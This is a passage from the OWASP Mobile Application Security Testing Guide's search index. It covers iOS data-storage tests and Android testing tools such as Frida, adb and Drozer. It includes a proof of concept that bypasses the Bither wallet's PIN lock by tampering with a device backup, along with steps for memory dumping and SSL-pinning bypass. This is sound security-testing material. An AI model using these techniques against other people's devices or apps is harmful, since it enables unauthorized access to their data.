statements for development and debugging, then disable them before shipping the software. You can do this by adding the following code to the appropriate PREFIX_HEADER (*.pch) file:
#ifdef DEBUG\n# define NSLog (...) NSLog(__VA_ARGS__)\n#else\n# define NSLog (...)\n#endif\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0053/#dynamic-analysis","title":"Dynamic Analysis","text":"In the section \"Monitoring System Logs\" of the chapter \"iOS Basic Security Testing\" various methods for checking the device logs are explained. Navigate to a screen that displays input fields that take sensitive user information.
After starting one of the methods, fill in the input fields. If sensitive data is displayed in the output, the app fails this test.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/","title":"Determining Whether Sensitive Data Is Shared with Third Parties","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/#overview","title":"Overview","text":"Sensitive information might be leaked to third parties by several means. On iOS typically via third-party services embedded in the app.
The features these services provide can involve tracking services to monitor the user's behavior while using the app, selling banner advertisements, or improving the user experience.
The downside is that developers don't usually know the details of the code executed via third-party libraries. Consequently, no more information than is necessary should be sent to a service, and no sensitive information should be disclosed.
Most third-party services are implemented in two ways:
To determine whether API calls and functions provided by the third-party library are used according to best practices, review their source code, requested permissions and check for any known vulnerabilities.
All data that's sent to third-party services should be anonymized to prevent exposure of PII (Personal Identifiable Information) that would allow the third party to identify the user account. No other data (such as IDs that can be mapped to a user account or session) should be sent to a third party.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/#dynamic-analysis","title":"Dynamic Analysis","text":"Check all requests to external services for embedded sensitive information. To intercept traffic between the client and server, you can perform dynamic analysis by launching a man-in-the-middle (MITM) attack with Burp Suite Professional or OWASP ZAP. Once you route the traffic through the interception proxy, you can try to sniff the traffic that passes between the app and server. All app requests that aren't sent directly to the server on which the main function is hosted should be checked for sensitive information, such as PII in a tracker or ad service.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/","title":"Finding Sensitive Data in the Keyboard Cache","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#static-analysis","title":"Static Analysis","text":" textObject.autocorrectionType = UITextAutocorrectionTypeNo;\n textObject.secureTextEntry = YES;\n
Interface Builder
of Xcode and verify the states of Secure Text Entry
and Correction
in the Attributes Inspector
for the appropriate object.The application must prevent the caching of sensitive information entered into text fields. You can prevent caching by disabling it programmatically, using the textObject.autocorrectionType = UITextAutocorrectionTypeNo
directive in the desired UITextFields, UITextViews, and UISearchBars. For data that should be masked, such as PINs and passwords, set textObject.secureTextEntry
to YES
.
UITextField *textField = [ [ UITextField alloc ] initWithFrame: frame ];\ntextField.autocorrectionType = UITextAutocorrectionTypeNo;\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#dynamic-analysis","title":"Dynamic Analysis","text":"If a jailbroken iPhone is available, execute the following steps:
Settings > General > Reset > Reset Keyboard Dictionary
..dat
in the following directory and its subdirectories. (which might be different for iOS versions before 8.0): /private/var/mobile/Library/Keyboard/
UITextField *textField = [ [ UITextField alloc ] initWithFrame: frame ];\ntextField.autocorrectionType = UITextAutocorrectionTypeNo;\n
If you must use a non-jailbroken iPhone:
A backup of a device on which a mobile application has been installed will include all subdirectories (except for Library/Caches/
) and files in the app's private directory.
Therefore, avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories.
Although all the files in Documents/
and Library/Application Support/
are always backed up by default, you can exclude files from the backup by calling NSURL setResourceValue:forKey:error:
with the NSURLIsExcludedFromBackupKey
key.
You can use the NSURLIsExcludedFromBackupKey and CFURLIsExcludedFromBackupKey file system properties to exclude files and directories from backups. An app that needs to exclude many files can do so by creating its own subdirectory and marking that directory excluded. Apps should create their own directories for exclusion instead of excluding system-defined directories.
Both file system properties are preferable to the deprecated approach of directly setting an extended attribute. All apps running on iOS version 5.1 and later should use these properties to exclude data from backups.
The following is sample Objective-C code for excluding a file from a backup on iOS 5.1 and later:
- (BOOL)addSkipBackupAttributeToItemAtPath:(NSString *) filePathString\n{\n NSURL* URL= [NSURL fileURLWithPath: filePathString];\n assert([[NSFileManager defaultManager] fileExistsAtPath: [URL path]]);\n\n NSError *error = nil;\n BOOL success = [URL setResourceValue: [NSNumber numberWithBool: YES]\n forKey: NSURLIsExcludedFromBackupKey error: &error];\n if(!success){\n NSLog(@\"Error excluding %@ from backup %@\", [URL lastPathComponent], error);\n }\n return success;\n}\n
The following is sample Swift code for excluding a file from a backup on iOS 5.1 and later, see Swift excluding files from iCloud backup for more information:
enum ExcludeFileError: Error {\n case fileDoesNotExist\n case error(String)\n}\n\nfunc excludeFileFromBackup(filePath: URL) -> Result<Bool, ExcludeFileError> {\n var file = filePath\n\n do {\n if FileManager.default.fileExists(atPath: file.path) {\n var res = URLResourceValues()\n res.isExcludedFromBackup = true\n try file.setResourceValues(res)\n return .success(true)\n\n } else {\n return .failure(.fileDoesNotExist)\n }\n } catch {\n return .failure(.error(\"Error excluding \\(file.lastPathComponent) from backup \\(error)\"))\n }\n}\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0058/#dynamic-analysis","title":"Dynamic Analysis","text":"In order to test the backup, you obviously need to create one first. The most common way to create a backup of an iOS device is by using iTunes, which is available for Windows, Linux and of course macOS (till macOS Mojave). When creating a backup via iTunes you can always only backup the whole device and not select just a single app. Make sure that the option \"Encrypt local backup\" in iTunes is not set, so that the backup is stored in cleartext on your hard drive.
iTunes is not available anymore from macOS Catalina onwards. Managing of an iOS device, including updates, backup and restore has been moved to the Finder app. The approach remains the same, as described above.
After the iOS device has been backed up, you need to retrieve the file path of the backup, which are different locations on each OS. The official Apple documentation will help you to locate backups of your iPhone, iPad, and iPod touch.
When you want to navigate to the backup folder up to High Sierra you can easily do so. Starting with macOS Mojave you will get the following error (even as root):
$ pwd\n/Users/foo/Library/Application Support\n$ ls -alh MobileSync\nls: MobileSync: Operation not permitted\n
This is not a permission issue of the backup folder, but a new feature in macOS Mojave. You can solve this problem by granting full disk access to your terminal application by following the explanation on OSXDaily.
Before you can access the directory you need to select the folder with the UDID of your device. Check the section \"Getting the UDID of an iOS device\" in the \"iOS Basic Security Testing\" chapter on how to retrieve the UDID.
Once you know the UDID you can navigate into this directory and you will find the full backup of the whole device, which does include pictures, app data and whatever might have been stored on the device.
Review the data that's in the backed up files and folders. The structure of the directories and file names is obfuscated and will look like this:
$ pwd\n/Users/foo/Library/Application Support/MobileSync/Backup/416f01bd160932d2bf2f95f1f142bc29b1c62dcb/00\n$ ls | head -n 3\n000127b08898088a8a169b4f63b363a3adcf389b\n0001fe89d0d03708d414b36bc6f706f567b08d66\n000200a644d7d2c56eec5b89c1921dacbec83c3e\n
Therefore, it's not straightforward to navigate through it and you will not find any hints of the app you want to analyze in the directory or file name. You can consider using the iMazing shareware utility to assist here. Perform a device backup with iMazing and use its built-in backup explorer to easily analyze app container contents including original paths and file names.
Without iMazing or similar software you may need to resort to using grep to identify sensitive data. This is not the most thorough approach but you can try searching for sensitive data that you have keyed in while using the app before you made the backup. For example: the username, password, credit card data, PII or any data that is considered sensitive in the context of the app.
~/Library/Application Support/MobileSync/Backup/<UDID>\ngrep -iRn \"password\" .\n
As described in the Static Analysis section, any sensitive data that you're able to find should be excluded from the backup, encrypted properly by using the Keychain or not stored on the device in the first place.
To identify if a backup is encrypted, you can check the key named \"IsEncrypted\" from the file \"Manifest.plist\", located at the root of the backup directory. The following example shows a configuration indicating that the backup is encrypted:
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n...\n <key>Date</key>\n <date>2021-03-12T17:43:33Z</date>\n <key>IsEncrypted</key>\n <true/>\n...\n</plist>\n
In case you need to work with an encrypted backup, there are some Python scripts in DinoSec's GitHub repo, such as backup_tool.py and backup_passwd.py, that will serve as a good starting point. However, note that they might not work with the latest iTunes/Finder versions and might need to be tweaked.
You can also use the tool iOSbackup to easily read and extract files from a password-encrypted iOS backup.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0058/#proof-of-concept-removing-ui-lock-with-tampered-backup","title":"Proof of Concept: Removing UI Lock with Tampered Backup","text":"As discussed earlier, sensitive data is not limited to just user data and PII. It can also be configuration or settings files that affect app behavior, restrict functionality, or enable security controls. If you take a look at the open source bitcoin wallet app, Bither, you'll see that it's possible to configure a PIN to lock the UI. And after a few easy steps, you will see how to bypass this UI lock with a modified backup on a non-jailbroken device.
After you enable the pin, use iMazing to perform a device backup:
Next you can open the backup to view app container files within your target app:
At this point you can view all the backed up content for Bither.
This is where you can begin parsing through the files looking for sensitive data. In the screenshot you'll see the net.bither.plist
file which contains the pin_code
attribute. To remove the UI lock restriction, simply delete the pin_code
attribute and save the changes.
From there it's possible to easily restore the modified version of net.bither.plist
back onto the device using the licensed version of iMazing.
The free workaround, however, is to find the plist file in the obfuscated backup generated by iTunes/Finder. So create your backup of the device with Bither's PIN code configured. Then, using the steps described earlier, find the backup directory and grep for \"pin_code\" as shown below.
$ ~/Library/Application Support/MobileSync/Backup/<UDID>\n$ grep -iRn \"pin_code\" .\nBinary file ./13/135416dd5f251f9251e0f07206277586b7eac6f6 matches\n
You'll see there was a match on a binary file with an obfuscated name. This is your net.bither.plist
file. Go ahead and rename the file giving it a plist extension so Xcode can easily open it up for you.
Again, remove the pin_code
attribute from the plist and save your changes. Rename the file back to the original name (i.e., without the plist extension) and perform your backup restore. When the restore is complete you'll see that Bither no longer prompts you for the PIN code when launched.
When performing static analysis for sensitive data exposed via memory, you should
String
and NSString
,There are several approaches and tools available for dynamically testing the memory of an iOS app for sensitive data.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0060/#retrieving-and-analyzing-a-memory-dump","title":"Retrieving and Analyzing a Memory Dump","text":"Whether you are using a jailbroken or a non-jailbroken device, you can dump the app's process memory with objection and Fridump. You can find a detailed explanation of this process in the section \"Memory Dump\", in the chapter \"Tampering and Reverse Engineering on iOS\".
After the memory has been dumped (e.g. to a file called \"memory\"), depending on the nature of the data you're looking for, you'll need a set of different tools to process and analyze that memory dump. For instance, if you're focusing on strings, it might be sufficient for you to execute the command strings
or rabin2 -zz
to extract those strings.
# using strings\n$ strings memory > strings.txt\n\n# using rabin2\n$ rabin2 -ZZ memory > strings.txt\n
Open strings.txt
in your favorite editor and dig through it to identify sensitive information.
However if you'd like to inspect other kind of data, you'd rather want to use radare2 and its search capabilities. See radare2's help on the search command (/?
) for more information and a list of options. The following shows only a subset of them:
$ r2 <name_of_your_dump_file>\n\n[0x00000000]> /?\nUsage: /[!bf] [arg] Search stuff (see 'e??search' for options)\n|Use io.va for searching in non virtual addressing spaces\n| / foo\\x00 search for string 'foo\\0'\n| /c[ar] search for crypto materials\n| /e /E.F/i match regular expression\n| /i foo search for string 'foo' ignoring case\n| /m[?][ebm] magicfile search for magic, filesystems or binary headers\n| /v[1248] value look for an `cfg.bigendian` 32bit value\n| /w foo search for wide string 'f\\0o\\0o\\0'\n| /x ff0033 search for hex string\n| /z min max search for strings of given size\n...\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0060/#runtime-memory-analysis","title":"Runtime Memory Analysis","text":"By using r2frida you can analyze and inspect the app's memory while running and without needing to dump it. For example, you may run the previous search commands from r2frida and search the memory for a string, hexadecimal values, etc. When doing so, remember to prepend the search command (and any other r2frida specific commands) with a backslash :
after starting the session with r2 frida://usb//<name_of_your_app>
.
For more information, options and approaches, please refer to section \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on iOS\".
"},{"location":"MASTG/tools/","title":"Testing Tools","text":"The OWASP MASTG includes many tools to assist you in executing test cases, allowing you to perform static analysis, dynamic analysis, dynamic instrumentation, etc. These tools are meant to help you conduct your own assessments, rather than provide a conclusive result on an application's security status. It's essential to carefully review the tools' output, as it can contain both false positives and false negatives.
The goal of the MASTG is to be as accessible as possible. For this reason, we prioritize including tools that meet the following criteria:
In instances where no suitable open-source alternative exists, we may include closed-source tools. However, any closed-source tools included must be free to use, as we aim to avoid featuring paid tools whenever possible. This also extends to freeware or community editions of commercial tools.
Our goal is to be vendor-neutral and to serve as a trusted learning resource, so the specific category of \"automated mobile application security scanners\" presents a unique challenge. For this reason, we have historically avoided including such tools due to the competitive disadvantages they can create among vendors. In contrast, we prioritize tools like MobSF that provide full access to their code and a comprehensive set of tests, making them excellent for educational purposes. Tools that lack this level of transparency, even if they offer a free version, generally do not meet the inclusion criteria of the OWASP MAS project.
Disclaimer: Each tool included in the MASTG examples was verified to be functional at the time it was added. However, the tools may not work properly depending on the OS version of both your host computer and your test device. The functionality of the tools can also be affected by whether you're using a rooted or jailbroken device, the specific version of the rooting or jailbreaking method, and/or the tool version itself. The OWASP MASTG does not assume any responsibility for the operational status of these tools. If you encounter a broken tool or example, we recommend searching online for a solution or contacting the tool's provider directly. If the tool has a GitHub page, you may also open an issue there.
"},{"location":"MASTG/tools/#generic-tools","title":"Generic Tools","text":"ID Name Platform MASTG-TOOL-0037 RMS Runtime Mobile Security generic MASTG-TOOL-0031 Frida generic MASTG-TOOL-0035 MobSF generic MASTG-TOOL-0032 Frida CodeShare generic MASTG-TOOL-0033 Ghidra generic MASTG-TOOL-0036 r2frida generic MASTG-TOOL-0038 objection generic MASTG-TOOL-0034 LIEF generic MASTG-TOOL-0098 iaito generic"},{"location":"MASTG/tools/#android-tools","title":"Android Tools","text":"ID Name Platform MASTG-TOOL-0023 RootCloak Plus android MASTG-TOOL-0015 Drozer android MASTG-TOOL-0003 nm - Android android MASTG-TOOL-0004 adb android MASTG-TOOL-0009 APKiD android MASTG-TOOL-0024 Scrcpy android MASTG-TOOL-0029 objection for Android android MASTG-TOOL-0006 Android SDK android MASTG-TOOL-0025 SSLUnpinning android MASTG-TOOL-0018 jadx android MASTG-TOOL-0007 Android Studio android MASTG-TOOL-0019 jdb android MASTG-TOOL-0099 FlowDroid android MASTG-TOOL-0028 radare2 for Android android MASTG-TOOL-0001 Frida for Android android MASTG-TOOL-0014 Bytecode Viewer android MASTG-TOOL-0008 Android-SSL-TrustKiller android MASTG-TOOL-0021 Magisk android MASTG-TOOL-0010 APKLab android MASTG-TOOL-0011 Apktool android MASTG-TOOL-0017 House android MASTG-TOOL-0026 Termux android MASTG-TOOL-0002 MobSF for Android android MASTG-TOOL-0030 Angr android MASTG-TOOL-0027 Xposed android MASTG-TOOL-0013 Busybox android MASTG-TOOL-0016 gplaycli android MASTG-TOOL-0022 Proguard android MASTG-TOOL-0020 JustTrustMe android MASTG-TOOL-0012 apkx android MASTG-TOOL-0005 Android NDK android"},{"location":"MASTG/tools/#ios-tools","title":"Ios Tools","text":"ID Name Platform MASTG-TOOL-0053 iOSbackup ios MASTG-TOOL-0040 MobSF for iOS ios MASTG-TOOL-0074 objection for iOS ios MASTG-TOOL-0072 xcrun ios MASTG-TOOL-0069 Usbmuxd ios MASTG-TOOL-0057 lldb ios MASTG-TOOL-0071 Xcode Command Line Tools ios MASTG-TOOL-0066 SSL Kill Switch 3 ios MASTG-TOOL-0051 gdb ios MASTG-TOOL-0050 Frida-ios-dump ios MASTG-TOOL-0060 otool ios MASTG-TOOL-0041 nm - iOS ios MASTG-TOOL-0046 Cycript ios MASTG-TOOL-0065 simctl ios MASTG-TOOL-0068 SwiftShield ios MASTG-TOOL-0039 Frida for iOS ios MASTG-TOOL-0044 class-dump-z ios MASTG-TOOL-0055 iProxy ios MASTG-TOOL-0048 dsdump ios MASTG-TOOL-0059 optool ios MASTG-TOOL-0056 Keychain-Dumper ios MASTG-TOOL-0042 BinaryCookieReader ios MASTG-TOOL-0047 Cydia ios MASTG-TOOL-0101 codesign ios MASTG-TOOL-0062 Plutil ios MASTG-TOOL-0073 radare2 for iOS ios MASTG-TOOL-0049 Frida-cycript ios MASTG-TOOL-0061 Grapefruit ios MASTG-TOOL-0064 Sileo ios MASTG-TOOL-0067 swift-demangle ios MASTG-TOOL-0045 class-dump-dyld ios MASTG-TOOL-0058 MachoOView ios MASTG-TOOL-0063 security ios MASTG-TOOL-0054 ios-deploy ios MASTG-TOOL-0070 Xcode ios MASTG-TOOL-0043 class-dump ios"},{"location":"MASTG/tools/#network-tools","title":"Network Tools","text":"ID Name Platform MASTG-TOOL-0075 Android tcpdump network MASTG-TOOL-0078 MITM Relay network MASTG-TOOL-0076 bettercap network MASTG-TOOL-0097 mitmproxy network MASTG-TOOL-0081 Wireshark network MASTG-TOOL-0079 OWASP ZAP network MASTG-TOOL-0080 tcpdump network MASTG-TOOL-0077 Burp Suite network"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/","title":"Frida for Android","text":"Frida supports interaction with the Android Java runtime though the Java API. You'll be able to hook and call both Java and native functions inside the process and its native libraries. Your JavaScript snippets have full access to memory, e.g. to read and/or write any structured data.
Here are some tasks that Frida APIs offers and are relevant or exclusive on Android:
Remember that on Android, you can also benefit from the built-in tools provided when installing Frida, that includes the Frida CLI (frida
), frida-ps
, frida-ls-devices
and frida-trace
, to name some of them.
Frida is often compared to Xposed, however this comparison is far from fair as both frameworks were designed with different goals in mind. This is important to understand as an app security tester so that you can know which framework to use in which situation:
Note that Xposed, as of early 2019, does not work on Android 9 (API level 28) yet.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#installing-frida-on-android","title":"Installing Frida on Android","text":"In order to set up Frida on your Android device:
We assume a rooted device here unless otherwise noted. Download the frida-server binary from the Frida releases page. Make sure that you download the right frida-server binary for the architecture of your Android device or emulator: x86, x86_64, arm or arm64. Make sure that the server version (at least the major version number) matches the version of your local Frida installation. PyPI usually installs the latest version of Frida. If you're unsure which version is installed, you can check with the Frida command line tool:
frida --version\n
Or you can run the following command to automatically detect Frida version and download the right frida-server binary:
wget https://github.com/frida/frida/releases/download/$(frida --version)/frida-server-$(frida --version)-android-arm.xz\n
Copy frida-server to the device and run it:
adb push frida-server /data/local/tmp/\nadb shell \"chmod 755 /data/local/tmp/frida-server\"\nadb shell \"su -c /data/local/tmp/frida-server &\"\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#using-frida-on-android","title":"Using Frida on Android","text":"With frida-server running, you should now be able to get a list of running processes with the following command (use the -U
option to indicate Frida to use a connected USB devices or emulator):
$ frida-ps -U\n PID Name\n----- --------------------------------------------------------------\n 276 adbd\n 956 android.process.media\n 198 bridgemgrd\n30692 com.android.chrome\n30774 com.android.chrome:privileged_process0\n30747 com.android.chrome:sandboxed\n30834 com.android.chrome:sandboxed\n 3059 com.android.nfc\n 1526 com.android.phone\n17104 com.android.settings\n 1302 com.android.systemui\n(...)\n
Or restrict the list with the -Uai
flag combination to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n----- ---------------------------------------- ------------------------------\n 766 Android System android\n30692 Chrome com.android.chrome\n 3520 Contacts Storage com.android.providers.contacts\n - Uncrackable1 sg.vantagepoint.uncrackable1\n - drozer Agent com.mwr.dz\n
This will show the names and identifiers of all apps, if they are currently running it will also show their PIDs. Search for your app in the list and take a note of the PID or its name/identifier. From now on you'll refer to your app by using one of them. A recommendation is to use the identifiers, as the PIDs will change on each run of the app. For example let's take com.android.chrome
. You can use this string now on all Frida tools, e.g. on the Frida CLI, on frida-trace or from a Python script.
To trace specific (low-level) library calls, you can use the frida-trace
command line tool:
frida-trace -U com.android.chrome -i \"open\"\n
This generates a little JavaScript in __handlers__/libc.so/open.js
, which Frida injects into the process. The script traces all calls to the open
function in libc.so
. You can modify the generated script according to your needs with Frida JavaScript API.
Unfortunately tracing high-level methods of Java classes is not yet supported (but might be in the future).
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#frida-cli-and-the-java-api","title":"Frida CLI and the Java API","text":"Use the Frida CLI tool (frida
) to work with Frida interactively. It hooks into a process and gives you a command line interface to Frida's API.
frida -U com.android.chrome\n
With the -l
option, you can also use the Frida CLI to load scripts , e.g., to load myscript.js
:
frida -U -l myscript.js com.android.chrome\n
Frida also provides a Java API, which is especially helpful for dealing with Android apps. It lets you work with Java classes and objects directly. Here is a script to overwrite the onResume
function of an Activity class:
Java.perform(function () {\n var Activity = Java.use(\"android.app.Activity\");\n Activity.onResume.implementation = function () {\n console.log(\"[*] onResume() got called!\");\n this.onResume();\n };\n});\n
The above script calls Java.perform
to make sure that your code gets executed in the context of the Java VM. It instantiates a wrapper for the android.app.Activity
class via Java.use
and overwrites the onResume
function. The new onResume
function implementation prints a notice to the console and calls the original onResume
method by invoking this.onResume
every time an activity is resumed in the app.
The JADX decompiler (v1.3.3 and above) can generate Frida snippets through its graphical code browser. To use this feature, open the APK or DEX with jadx-gui
, browse to the target method, right click the method name, and select \"Copy as frida snippet (f)\". For example using the MASTG UnCrackable App for Android Level 1:
The above steps place the following output in the pasteboard, which you can then paste in a JavaScript file and feed into frida -U -l
.
let a = Java.use(\"sg.vantagepoint.a.a\");\na[\"a\"].implementation = function (bArr, bArr2) {\n console.log('a is called' + ', ' + 'bArr: ' + bArr + ', ' + 'bArr2: ' + bArr2);\n let ret = this.a(bArr, bArr2);\n console.log('a ret value is ' + ret);\n return ret;\n};\n
The above code hooks the a
method within the sg.vantagepoint.a.a
class and logs its input parameters and return values.
Frida also lets you search for and work with instantiated objects that are on the heap. The following script searches for instances of android.view.View
objects and calls their toString
method. The result is printed to the console:
setImmediate(function() {\n console.log(\"[*] Starting script\");\n Java.perform(function () {\n Java.choose(\"android.view.View\", {\n \"onMatch\":function(instance){\n console.log(\"[*] Instance found: \" + instance.toString());\n },\n \"onComplete\":function() {\n console.log(\"[*] Finished heap search\")\n }\n });\n });\n});\n
The output would look like this:
[*] Starting script\n[*] Instance found: android.view.View{7ccea78 G.ED..... ......ID 0,0-0,0 #7f0c01fc app:id/action_bar_black_background}\n[*] Instance found: android.view.View{2809551 V.ED..... ........ 0,1731-0,1731 #7f0c01ff app:id/menu_anchor_stub}\n[*] Instance found: android.view.View{be471b6 G.ED..... ......I. 0,0-0,0 #7f0c01f5 app:id/location_bar_verbose_status_separator}\n[*] Instance found: android.view.View{3ae0eb7 V.ED..... ........ 0,0-1080,63 #102002f android:id/statusBarBackground}\n[*] Finished heap search\n
You can also use Java's reflection capabilities. To list the public methods of the android.view.View
class, you could create a wrapper for this class in Frida and call getMethods
from the wrapper's class
property:
Java.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n console.log(methods[i].toString());\n }\n});\n
This will print a very long list of methods to the terminal:
public boolean android.view.View.canResolveLayoutDirection()\npublic boolean android.view.View.canResolveTextAlignment()\npublic boolean android.view.View.canResolveTextDirection()\npublic boolean android.view.View.canScrollHorizontally(int)\npublic boolean android.view.View.canScrollVertically(int)\npublic final void android.view.View.cancelDragAndDrop()\npublic void android.view.View.cancelLongPress()\npublic final void android.view.View.cancelPendingInputEvents()\n...\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0002/","title":"MobSF for Android","text":"After MobSF is done with its analysis, you will receive a one-page overview of all the tests that were executed. The page is split up into multiple sections giving some first hints on the attack surface of the application.
The following is displayed:
AndroidManifest.xml
file.Refer to MobSF documentation for more details.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0003/","title":"nm - Android","text":"nm is a tool that displays the name list (symbol table) of the given binary. You can find here more information for the Android (GNU) version.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0004/","title":"adb","text":"adb (Android Debug Bridge), shipped with the Android SDK, bridges the gap between your local development environment and a connected Android device. You'll usually leverage it to test apps on the emulator or a connected device via USB or Wi-Fi. Use the adb devices
command to list the connected devices and execute it with the -l
argument to retrieve more details on them.
$ adb devices -l\nList of devices attached\n090c285c0b97f748 device usb:1-1 product:razor model:Nexus_7 device:flo\nemulator-5554 device product:sdk_google_phone_x86 model:Android_SDK_built_for_x86 device:generic_x86 transport_id:1\n
adb provides other useful commands such as adb shell
to start an interactive shell on a target and adb forward
to forward traffic on a specific host port to a different port on a connect device.
adb forward tcp:<host port> tcp:<device port>\n
$ adb -s emulator-5554 shell\nroot@generic_x86:/ # ls\nacct\ncache\ncharger\nconfig\n...\n
You'll come across different use cases on how you can use adb commands when testing later in this book. Note that you must define the serialnummer of the target device with the -s
argument (as shown by the previous code snippet) in case you have multiple devices connected.
The Android NDK contains prebuilt versions of the native compiler and toolchain. Both the GCC and Clang compilers have traditionally been supported, but active support for GCC ended with NDK revision 14. The device architecture and host OS determine the appropriate version. The prebuilt toolchains are in the toolchains
directory of the NDK, which contains one subdirectory for each architecture.
Besides picking the right architecture, you need to specify the correct sysroot for the native API level you want to target. The sysroot is a directory that contains the system headers and libraries for your target. Native APIs vary by Android API level. Available sysroot directories for each Android API level can be found in $NDK/platforms/
. Each API level directory contains subdirectories for the various CPUs and architectures.
One possibility for setting up the build system is exporting the compiler path and necessary flags as environment variables. To make things easier, however, the NDK allows you to create a so-called standalone toolchain, which is a temporary toolchain that incorporates the required settings.
To set up a standalone toolchain, download the latest stable version of the NDK. Extract the ZIP file, change into the NDK root directory, and run the following command:
./build/tools/make_standalone_toolchain.py --arch arm --api 24 --install-dir /tmp/android-7-toolchain\n
This creates a standalone toolchain for Android 7.0 (API level 24) in the directory /tmp/android-7-toolchain
. For convenience, you can export an environment variable that points to your toolchain directory, (we'll be using this in the examples). Run the following command or add it to your .bash_profile
or other startup script:
export TOOLCHAIN=/tmp/android-7-toolchain\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0006/","title":"Android SDK","text":"Local Android SDK installations are managed via Android Studio. Create an empty project in Android Studio and select Tools -> SDK Manager to open the SDK Manager GUI. The SDK Platforms tab is where you install SDKs for multiple API levels. Recent API levels are:
An overview of all Android codenames, their version number and API levels can be found in the Android Developer Documentation.
Installed SDKs are on the following paths:
Windows:
C:\\Users\\<username>\\AppData\\Local\\Android\\sdk\n
MacOS:
/Users/<username>/Library/Android/sdk\n
Note: On Linux, you need to choose an SDK directory. /opt
, /srv
, and /usr/local
are common choices.
The official IDE for Google's Android operating system, built on JetBrains' IntelliJ IDEA software and designed specifically for Android development - https://developer.android.com/studio/index.html
"},{"location":"MASTG/tools/android/MASTG-TOOL-0008/","title":"Android-SSL-TrustKiller","text":"Android-SSL-TrustKiller is a Cydia Substrate Module acting as a blackbox tool to bypass SSL certificate pinning for most applications running on a device - https://github.com/iSECPartners/Android-SSL-TrustKiller
"},{"location":"MASTG/tools/android/MASTG-TOOL-0009/","title":"APKiD","text":"APKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff.
For more information on what this tool can be used for, check out:
APKLab is a convenient Visual Studio Code extension leveraging tools such as apktool and jadx to enable features including app unpacking, decompilation, code patching (e.g. for MITM), and repackaging straight from the IDE.
For more information, you can refer to APKLab's official documentation.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0011/","title":"Apktool","text":"Apktool is used to unpack Android app packages (APKs). Simply unzipping APKs with the standard unzip
utility leaves some files unreadable. AndroidManifest.xml
is encoded into binary XML format which isn\u2019t readable with a text editor. Also, the app resources are still packaged into a single archive file.
When run with default command line flags, apktool automatically decodes the Android Manifest file to text-based XML format and extracts the file resources (it also disassembles the .DEX files to smali code - a feature that we\u2019ll revisit later in this book).
Among the unpacked files you can usually find (after running apktool d base.apk
):
You can also use apktool to repackage decoded resources back to binary APK/JAR. See the section \"Exploring the App Package\" later on this chapter and section \"Repackaging\" in the chapter Tampering and Reverse Engineering on Android for more information and practical examples.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0012/","title":"apkx","text":"apkx is a Python wrapper to popular free DEX converters and Java decompilers. It automates the extraction, conversion, and decompilation of APKs. Install it as follows:
git clone https://github.com/muellerberndt/apkx\ncd apkx\nsudo ./install.sh\n
This should copy apkx to /usr/local/bin
. See section \"Decompiling Java Code\" of the \"Reverse Engineering and Tampering\" chapter for more information about usage.
Busybox combines multiple common Unix utilities into a small single executable. The utilities included generally have fewer options than their full-featured GNU counterparts, but are sufficient enough to provide a complete environment on a small or embedded system. Busybox can be installed on a rooted device by downloading the Busybox application from Google Play Store. You can also download the binary directly from the Busybox website. Once downloaded, make an adb push busybox /data/local/tmp
to have the executable available on your phone. A quick overview of how to install and use Busybox can be found in the Busybox FAQ.
Bytecode Viewer (BCV) is a free and open source Java decompiler framework running on all operating systems. It is a versatile tool which can be used to decompile Android apps, view APK resources (via apktool) and easily edit APKs (via Smali/Baksmali). Apart from APKs, also DEX, Java Class files and Java Jars can be viewed. One of its major features is the support for multiple Java bytecode decompilers under one GUI. BCV currently includes the Procyon, CFR, Fernflower, Krakatau, and JADX-Core decompilers. These decompilers have different strengths and can be easily leveraged while using BCV, especially when dealing with obfuscated programs.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/","title":"Drozer","text":"Drozer is an Android security assessment framework that allows you to search for security vulnerabilities in apps and devices by assuming the role of a third-party app interacting with the other application's IPC endpoints and the underlying OS.
The advantage of using drozer consists on its ability to automate several tasks and that it can be expanded through modules. The modules are very helpful and they cover different categories including a scanner category that allows you to scan for known defects with a simple command such as the module scanner.provider.injection
which detects SQL injections in content providers in all the apps installed in the system. Without drozer, simple tasks such as listing the app's permissions require several steps that include decompiling the APK and manually analyzing the results.
You can refer to drozer GitHub page (for Linux and Windows, for macOS please refer to this blog post) and the drozer website for prerequisites and installation instructions.
